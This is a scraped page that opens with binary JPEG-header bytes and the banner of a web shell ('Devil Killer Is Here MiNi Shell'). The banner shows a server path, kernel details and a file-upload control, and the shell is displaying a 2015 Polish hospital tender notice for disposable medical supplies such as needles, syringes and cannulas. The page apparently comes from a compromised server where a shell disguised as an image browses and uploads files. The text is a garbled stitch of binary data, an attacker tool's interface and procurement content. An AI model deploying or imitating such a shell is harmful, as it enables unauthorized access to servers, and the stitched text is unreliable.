JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150526/76439-N-2015.html

<p class="kh_header"><b>Bochnia: Dostawa sprzętu jednorazowego
dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni
Szpital Powiatowy im. bł. Marty Wieckiej (I)</b><br>
<b>Numer ogłoszenia: 76439 - 2015; data zamieszczenia: 26.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" im. bł. Marty Wieckiej , ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 14 6153201, 6153233, 50979196, faks 14 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu jednorazowego
dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni
Szpital Powiatowy im. bł. Marty Wieckiej (I).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.1).	PRZEDMIOT ZAMÓWIENIA
II.1.1)	Przedmiotem zamówienia jest Dostawa sprzętu jednorazowego dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni  Szpital Powiatowy im. bł. Marty Wieckiej (powtórka pakietów (1- 6) unieważnionych w postępowaniu DZ-271-1-8/2015)
II.1.2)	Przedmiot zamówienia został podzielony na 6 pakietów:
Pakiet nr 1 (1) - Igły, strzykawki
Pakiet nr 2 (6) - Ginekologiczny sprzęt jednorazowego użytku
Pakiet nr 3 (9) - Kaniule, kraniki, igły bezpieczne, igły do penów, zamknięte systemy*
Pakiet nr 4 (13) - Ostrza, elektrody oraz inny sprzęt jednorazowy
Pakiet nr 5 (23) - Akcesoria do fototerapii, dezynfekcji parowej oraz do podawania pokarmu niemowlętom
Pakiet nr 6 (31) - Akcesoria pomocnicze do nCPAP Infant Flow
Pakiet nr 7 - Różny sprzęt jednorazowego użytku.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">III.5.1)	Oświadczenie Wykonawcy o dopuszczeniu wyrobów medycznych do obrotu i stosowania na terenie Polski (według załącznika nr 5).
III.5.2)	Karta katalogowa lub folder w j. polskim - ze zdjęciem/rysunkiem pozwalająca Zamawiającemu na stwierdzenie spełniania wymaganych parametrów - każda strona musi zostać opisana którego pakietu i pozycji dotyczy.
III.5.3)	Wzory - próbki dla pakietu nr 2 (6) - poz.1, 3, pakietu nr 3 (9) zaopatrzone w oryginalne etykiety producenta lub potwierdzone kopie oznakowane numerem pakietu i pozycji w pakiecie (po 1 sztuce) wraz z wypełnionym wykazem próbek oferowanych produktów (według załącznika nr 6). Zamawiający oświadcza, że nie będzie zawracał próbek, które zostaną zużyte do przeprowadzenia testu zamawianego towaru i nie będzie zawracał równowartości. Próbki, które nie zostaną zużyte zawracane będą na pisemny wniosek Wykonawcy, z wyjątkiem tych dołączonych do ofert uznanych jako najkorzystniejsze.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1)	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
III.6.2)	W przypadku gdy, Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów - pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z określeniem zakresu udzielanych zasobów.
III.6.3)	Pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o udzielenie zamówienia publicznego lub do reprezentowania w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy - w przypadku wykonawców wspólnie ubiegający się o udzielenie 
III.6.4)	Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych (każda strona dokumentu) za zgodność z oryginałem przez  Wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy częściowych - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności. 
2)	Strony dopuszczają zmiany w umowie w następującym zakresie:
a)	numeru katalogowego poszczególnych Towarów 
b)	nazwy Towaru przy zachowaniu jego parametrów,
c)	sposobu konfekcjonowania,
3)	W przypadku zmiany wielkości opakowania wprowadzonej przez producenta, strony dopuszczają zmianę ceny za zbiorcze opakowanie Towarów objętych umową z zachowaniem jednak zasady proporcjonalności w stosunku do ceny jednostkowej poszczególnych Towarów objętej umową
4)	Wykonawca zobowiązuje się do nie zwiększania cen jednostkowych netto określonych w ofercie przetargowej przez okres trwania umowy, przy czym w czasie trwania umowy ceny mogą ulec zmianie w przypadku wzrostu/spadku obowiązujących stawek podatku VAT,  
5)	Zamawiający każdorazowo dopuszcza dostawy poszczególnych Towarów objętych umową po cenach niższych niż określone w niniejszej umowie. Wystawienie faktury z ceną niższą niż wymieniona w załączniku nr 1 do niniejszej umowy jest równoznaczne z zaoferowaniem przez Wykonawcę niższej ceny
6)	Zaistnienie okoliczności wymienionych w ust  5  nie wymaga sporządzenia aneksu.
7)	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w razie wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcie umowy tj.:
a)	zakończenia produkcji Towaru
b)	wygaśnięcia rejestracji Towaru
8)	Na potwierdzenie okoliczności, o których mowa w ust. 7 Wykonawca przedstawi zawiadomienie producenta lub stosownego organu.
9)	Wykonawca w sytuacji określonej w ust. 8, w porozumieniu z Zamawiającym zaproponuje, w terminie do 5 dni od przedstawienia stosownych dokumentów, produkt równoważny na zasadach wynikających z ust. 5, z zachowaniem formy pisemnej pod rygorem nieważności
10)	Cena jednostkowa proponowanego produktu nie może być wyższa niż produktu oferowanego w załączniku nr 1 do niniejszej umowy
11)	W przypadku zmiany bądź rezygnacji z podwykonawcy, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy z dnia 29 stycznia 2004r. Prawo Zamówień Publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca zobowiązany jest niezwłocznie w formie pisemnej wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy
ul.  Krakowska 31, 32-700 Bochnia, im. bł. Marty Wieckiej..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2015 godzina 13:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Bochni przy ul. Krakowskiej 31, na Dzienniku podawczym pokój nr 3, Pawilon A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 (1) - Igły, strzykawki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Przedmiot zamówienia	Rozmiar	Jednostka miary	Ilość jednostek miary zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Igła iniekcyjna	0,45 x 16	op.	1
2.		0,5 X 25	op.	175
3.		0,6 X 30	op.	82
4.		0,7 X 30	op.	135
5.		0,8 X 40	op.	650
6.		0,9 X 40	op.	810
7.		1,1 X 40	op.	28
8.		1,2 X 40	op.	750
9.	Igła do punkcji	1,8 x 40-50	op.	1
10.		2,1 x 40-50	op.	1
11.	Igła 	0,45 x 23	op.	1
12.	Strzykawka dwuczęściowa	2 ml	op.	485
13.	Strzykawka dwuczęściowa	5 ml	op.	945
14.	Strzykawka dwuczęściowa	10 ml	op.	760
15.	Strzykawka dwuczęściowa	20 ml	op.	701
16.	Strzykawka do pomp infuzyjnych	50 ml	szt.	3080
17.	Strzykawka do pomp infuzyjnych	50 - 60ml	szt.	1190
18.	Strzykawka Janeta	100  ml 	szt.	4050
19.	Strzykawka do TBC	1 ml	op.	16
20.	Strzykawka insulinowa	1 ml	op.	1
21.	Strzykawka trzyczęściowa 	3 ml	op.	9
22.	Strzykawka trzyczęściowa 	10 ml	op.	10
23.	Strzykawka  trzyczęściowa 	20 ml	op.	1
24.	Przyrząd do przetaczania  krwi	x	szt.	1620
25.	Przyrząd do przetaczania płynów infuzyjnych	x	szt.	65000
26.	Przyrząd do szybkiego przetaczania krwi	x	szt.	3
27.	Przyrząd do przetaczania płynów	x	szt.	90
28.	Aparat do przepływu infuzji	x	szt.	1000
29.	Zestaw do transfuzji wymiennej noworodków	x	szt.	1
30.	Zestaw do szybkiej infuzji krwi i płynów	pojemność 500 ml	szt.	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.06.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 (6) - Ginekologiczny sprzet jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Przedmiot zamówienia	Rozmiar	Jednostka miary	Ilość jednostek miary zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Wziernik ginekologiczny	S 82 x 24 mm	szt.	4600
		M 82 x 26,5 mm	szt.	8000
		L 82 x 33 mm	szt.	100
2.	Szpatułka ginekologiczna	x	op	25
3.	Szczoteczka do wykonywania próbek cytologicznych	x	op	30
4.	Szczoteczka do pobierania wymazu cytologicznego i bakteriologicznego z endometrium	x	szt.	100
5.	Szczoteczka do pobierania wymazów cytologicznych	x	op	1
6.	Utrwalacz do preparatów cytologicznych 	pojemność 150-200 ml	szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.06.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 (9) - Kaniule, kraniki, igły bezpieczne, igły do penów, zamknięte systemy*.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Przedmiot zamówienia	Rozmiar	Jednostka miary	Ilość jednostek miary zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Igły do iniekcji	21 G 1 1/2 (0,8 x 40 mm)	szt	100
2.	Igły do iniekcji	20 G1 1/2(0,9 x 40mm)	szt	100
3.	Igły do iniekcji	22 G 1 1/4 (0,7 x 30mm)	szt	100
4.	Igły do iniekcji	25 G 1 (0,5 x25 mm)	szt	100
5.	Strzykawki wypełnione fizjologicznym roztworem soli 	3 ml	szt	1300
6.	Igły do penów	8 mm x 0,30 mm  30G	szt	1900
7.	Kaniula obwodowa dożylna bez dodatkowego portu iniekcyjnego	26 G	szt.	150
8.	Kaniula dotętnicza	20G/1,1mm x 45mm	szt.	100
9.	Bezpieczna kaniula obwodowa bez portu górnego	24G - 07x19 mm	szt.	20
10.	Kaniula obwodowa dożylna bez dodatkowego portu iniekcyjnego	24 G	szt.	1550
11.	Kranik trójdrożny	xxxxxxxxxxx	szt.	2120
12.	Rampa do infuzji z pięcioma kranikami 	xxxxxxxxxxx	szt.	120
13.	Korki do kaniuli	xxxxxxxxxxx	szt.	28000
14.	Zamknięty system dostępu naczyniowego	xxxxxxxxxxx	szt	250
15.	Zamknięty system dostępu naczyniowego	xxxxxxxxxxx	szt	3 200
16.	Kaniula obwodowa dożylna z  samodomykającym się portem bocznym 	16G	szt.	200
17.	Kaniula obwodowa dożylna z  samodomykającym się portem bocznym 	18 G	szt.	700
18.	Kaniula obwodowa dożylna z  samodomykającym się portem bocznym 	20 G	szt.	4300
19.	Kaniula obwodowa dożylna z  samodomykającym się portem bocznym 	22 G	szt.	3550
20.	Kaniula obwodowa dożylna bezpieczna	18 G	szt.	3000
21.	Kaniula obwodowa dożylna bezpieczna	20 G	szt.	14300
22.	Kaniula obwodowa dożylna bezpieczna	22 G	szt.	7850.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.06.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 (13) - Ostrza, elektrody oraz inny sprzęt jednorazowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Przedmiot zamówienia	Rozmiar	Jednostka miary	Ilość jednostek miary zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Ostrza wymienne do skalpeli 	Nr 10	op.	50
		Nr 11	op.	6
		Nr 15	op.	1
		Nr 20	op.	25
		Nr 22	op.	2
		Nr 22A	op.	1
		Nr 23	op.	1
2.	Ostrza chirurgiczne z trzonkiem	Nr 10	op.	90
		Nr 11	op.	40
		Nr 15	op.	90
		Nr 20	op.	45
3.	Przedłużacz do pomp infuzyjnych z jasnym przewodem	       1,5 m	szt.	1500
4.	Przedłużacz do pompinfuzyjnych z ciemnym przewodem	       1,5 m	szt.	1400
5.	Komlet elektrod do stymulacji		kpl.	10
6.	Elektroda do czasowej stymulacji serca 	6F	szt.	1
7.	Zestaw do punkcji jamy opłucnowej 	80 cm	szt	20
8.	Introduktor - zestaw z zastawką do wprowadzania kateterów 	8F	szt.	1
9.	Zestaw do lewatywy	xxxxxxxxxxx	szt.	650
